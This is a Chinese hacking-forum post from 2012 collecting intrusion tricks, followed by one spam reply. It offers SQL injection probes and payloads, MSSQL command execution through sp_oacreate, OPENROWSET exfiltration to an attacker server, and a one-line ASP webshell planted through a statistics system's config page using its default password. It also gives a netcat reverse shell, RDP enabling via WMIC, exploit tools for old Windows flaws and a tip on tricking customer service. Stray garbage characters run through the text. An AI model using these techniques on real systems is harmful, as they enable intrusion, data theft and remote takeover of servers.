找回密码
 立即注册
查看: 3775|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关3 U$ q# t1 a0 f; C

, S; N' V$ W) e$ b% [, [) u$ o
  i- {2 |3 F' X$ ?( f: Q3 ^+ ^: S% uSA点数据库分离搞法+语句:9 _& ~/ C) }: q7 C+ l7 H$ @
' z& M4 K+ N. d$ _; l
注射点不显错,执行下面三条语句页面都返回正常。
) T$ d/ w7 i- w+ M% A* sand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')6 J$ W; Z/ @- c0 L5 k
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')$ t) S; b4 \2 v) L1 v
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')2 J& ^1 h: ?2 E. ^1 h, @( R
可以列目录,判断系统为2000,web与数据库分离
' P2 ?- p: K# Q- @9 a遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
  ?% b# [7 Q5 ~6 c* S8 E/ N& K8 Y在注射点上执行
7 d7 B  h# C. \7 T8 Pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
- d0 n4 D2 D& O+ G3 J0 d: m页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP4 N  L8 z( v6 ?" r
还有我用NC监听得其他端口都没有得到IP。
) _2 ?0 [# k6 u; M4 r* J+ I& N% [8 G  V& ]4 y
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。) h$ z! l8 F2 J
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--3 S* j- d  c4 a

5 F& `& z1 V# H& ?;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--5 S# B( l) c( h: i4 s3 f3 Z4 Z( i+ X

+ [  o1 `5 h2 V  k. B现在就猜想是不是数据库是内网而且不能连外网。$ [9 J: C" k, u/ f8 {

& }5 s8 i% l+ k' Z& c4 i  X) P7 @- K
access导出txt文本代码! }- M3 M3 t2 w% c5 D' O
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
, y$ o8 S6 G& F) C1 d+ i0 c5 ^# G, W( x0 l2 L

' Z" }$ L5 l) g1 y3 L
2 G; W( c8 V7 S- o9 K7 g自动跳转到指定网站代码头
) h6 f, Q( D6 R<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
! a1 A8 x9 q9 G) q2 p9 G& Z8 U0 u2 Q- P) m
5 \8 j$ u! }; m1 Z2 ^; v0 L" m
入侵java or jsp站点时默认配置文件路径:2 o. h2 {# P& F% c5 o. \
\web-inf\web.xml
* z& n# W5 y( N( U7 V! U  w; [tomcat下的配置文件位置:6 ^7 S6 p9 ?& V% [2 X2 U$ f& }- q
\conf\server.xml            (前面加上tomcat路径)( L) j9 ^% N+ I0 ^! L5 \
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
  L3 h' ?- S1 P1 w' q3 ?. V2 {$ S0 Y9 B# C

. p- k9 ~' G7 z% }4 }1 d
$ o7 _6 @5 ?( v* H4 j' U4 m3 T检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:: L' I9 s+ B3 H2 g2 i
-1%23
+ p) I8 x, s; L) v>
8 S/ b6 H9 d! ]<! I( i9 M: j. `0 w3 H4 [, m
1'+or+'1'='1
7 `( C0 C& G4 C2 k* P! Pid=8%bf
+ m( Q2 X0 ~1 N: i  |" b- K% E( O5 B1 H- i* J/ [
全新注入点检测试法:) S& L$ Y9 c: b: [" i) ^* s
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
& S" Z. g3 p/ B+ ^' m  u5 i# N: m1 b% Z0 v7 _. ~; m0 S; E$ F
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
5 e: r/ S- n( U' B+ D- O
) x" T# X* S3 b" R搜索型注入判断方法:/ ^5 D* M% K5 m- `1 Y& S! ~
北京%' and '1'='1' and '%'='3 w! i5 F% B+ T+ W( k2 r' e* J
北京%' and '1'='2' and '%'='
- C/ @6 ]" ^0 j) v" \  F" s3 d1 l$ X5 o5 U1 t# l5 z. U* T7 M: {

5 h: \/ I, a/ M1 rCOOKIES注入:
/ f) o; P" B1 K' k2 I5 b- n, K
javascript:alert(document.cookie="id="+escape("51 and 1=1"));- P% S. l# \, K1 X1 [$ B  W1 i

; Y# K: {" g3 J' o2000专业版查看本地登录用户命令:7 x8 f' _. N% r) Y- ^1 R
net config workstation
  o* O& |) c5 I" B  X
" {0 h! ~3 |  @# _( V) t) }5 J/ }$ p; m# S4 i) z  Q4 p, n/ v3 P
2003下查看ipsec配置和默认防火墙配置命令:
' f+ c# t8 o# S8 _# E; tnetsh firewall show config/ {7 [" F$ |4 D, }% R- O
netsh ipsec static show all
. G/ B6 M- P8 T: {& Z: b5 z5 m3 K% j# a- e7 U2 Z
不指派指定策略命令:
2 W6 f  p$ L* S! R$ B2 x7 Dnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)" L) p7 S- X: r% w
netsh ipsec static show policy all  显示策略名
% k, Q- y8 p% n. I. n/ ]! M  X9 s) F9 X! `1 _2 I! B, Z- V
& b0 [1 Q8 x. c( _$ X" f; v
猜管理员后台小技巧:
# A" }) \/ B2 @0 f: uadmin/left.asp
( ]% B: z6 \$ V% I1 [+ E6 Q1 Dadmin/main.asp( G  v* }) P3 ^. N& Z0 M
admin/top.asp$ F7 r* S! |& v, S# F  o  k
admin/admin.asp . b2 v: V# p4 B+ w
会现出菜单导航,然后迅雷下载全部链接
" L+ e; b/ i$ L3 Q: [
6 `4 m9 |) ~! e9 S3 l- `% q1 V' h$ ]1 h
社会工程学:" n6 P) Z/ l5 ]  f1 R) Z
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
9 H" ~0 Z8 x% [# o! o然后去骗客服
' n8 c; X% {0 D! _  _' {. J. T0 {- J0 r
/ D3 E" i+ C; q8 |. Z$ l
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 9 E3 l0 q4 K; M4 D3 x% a( X; h' N8 w* X
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
' Y; o& I. S. r( B" _  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
3 w- E* c- ?3 L  Z! q0 b5 O* l5 J+ B
$ J6 h# I* ?& ?: r6 z
. l# J3 ?, X8 ]+ V5 b5 W
1 e, a" O+ m6 C2 [; q" |6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)8 n) \6 c9 i  y2 t, d
2 m: L( |; |! E, o- R$ N) Z# {- y

- E+ V/ Z( y; ?% o0 y' M: q* j
9 l  U( n- \! Q& u' fCMD加密注册表位置7 ~+ ?/ `! i& n6 @( r* I5 r9 R% o0 t
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor0 s8 p  u  B8 L6 Q, G" ]
AutoRun+ A% q5 D! l, Z' _2 n

# d% E! b  |2 a(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor& e" [  x$ F8 L2 \" y/ j
AutoRun; x) B# }  q& _3 y
" m* g5 M5 b- `7 V. v" N" [

) `7 y) H7 E; T7 c2 y在找注入时搜索Hidden,把他改成test9 C( z5 ?6 r9 N; W
3 [( u0 d9 M  r+ n# s; z8 j) n9 U% j
" G3 C& v& ?/ P/ H  D% k

& k3 F# J3 ^( L, Q0 _' Vmstsc /v:IP /console
" a% Z" \6 F% z+ c- A5 h
8 I  @" W( f4 e+ C; K
& i6 h0 \+ k* K& S7 q% i一句话开3389:
0 j1 ?! M( O* O. [$ U" b
/ V  D+ F: n% u3 |最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
$ ^5 ~0 N. u' ~5 Y开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.2 Z3 i( C% y: J3 z, N7 F+ D9 G
2 r! U  k7 I/ E; x4 @" q

+ ?4 ^3 v: D6 _知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
. F: A; A5 n, W* _, sInsert into admin(user,pwd) values('test','test'). F% T" Q$ t1 m( \5 g; J# n$ t

3 n& i( t  w4 o3 W  n- S$ R  v$ P# b
NC反弹2 d7 q' I! J( j; p4 Y! m/ ]& G
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   / _! t: a5 K4 L+ p& O! q
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
6 k5 ]1 S3 [6 P9 n( d1 J( u
; c& P/ W& `5 M" O; k, }' l- r* L! X8 s  q
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题7 g$ q% v$ w3 r& G

6 z: x. Q+ r6 [8 x5 h( \" ]有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
" @0 s$ z3 e, ?3 `# y0 z  R! N例如:, A" y) {0 Z, I4 y
subst k: d:\www\ 用d盘www目录替代k盘6 L$ H) |, z' y  ^: |6 r* p
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表